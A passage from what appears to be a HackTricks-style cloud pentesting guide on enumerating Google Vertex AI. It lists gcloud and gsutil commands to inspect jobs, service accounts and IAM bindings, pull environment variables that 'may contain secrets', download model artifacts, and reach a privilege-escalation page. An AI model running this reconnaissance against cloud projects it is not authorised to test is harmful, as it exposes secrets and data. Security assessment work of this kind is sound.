gcloud ai endpoints describe <endpoint-id> --region=<region> --format="value(trafficSplit)"
```
### Custom Job Information
```bash
# Get job details including command, args, and service account
gcloud ai custom-jobs describe <job-id> --region=<region>
# Get service account used by job
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.workerPoolSpecs[0].serviceAccount)"
# Get container image used
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.workerPoolSpecs[0].containerSpec.imageUri)"
# Check environment variables (may contain secrets)
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.workerPoolSpecs[0].containerSpec.env)"
# Get network configuration
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.network)"
```
### Access Control
```bash
# Note: IAM policies for individual Vertex AI resources are managed at the project level
# Check project-level permissions
gcloud projects get-iam-policy <project-id>
# Check service account permissions
gcloud iam service-accounts get-iam-policy <service-account-email>
# Check if endpoints allow unauthenticated access
# This is controlled by IAM bindings on the endpoint
gcloud projects get-iam-policy <project-id> \
--flatten="bindings[].members" \
--filter="bindings.role:aiplatform.user"
```
### Storage and Artifacts
```bash
# Models and training jobs often store artifacts in GCS
# List buckets that might contain model artifacts
gsutil ls
# Common artifact locations:
# gs://<project>-aiplatform-<region>/
# gs://<project>-vertex-ai/
# gs://<custom-bucket>/vertex-ai/
# Download model artifacts if accessible
gsutil -m cp -r gs://<bucket>/path/to/artifacts ./artifacts/
# Check for notebooks in AI Platform Notebooks
gcloud notebooks instances list --location=<location>
gcloud notebooks instances describe <instance-name> --location=<location>
```
### Model Garden
```bash
# List Model Garden endpoints
gcloud ai endpoints list --list-model-garden-endpoints-only --region=<region>
# Model Garden models are often deployed with default configurations
# Check for publicly accessible endpoints
```
### Privilege Escalation
In the following page, you can check how to **abuse Vertex AI permissions to escalate privileges**:
{{#ref}}
../gcp-privilege-escalation/gcp-vertex-ai-privesc.md
{{#endref}}
## References
- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)
{{#include ../../../banners/hacktricks-training.md}}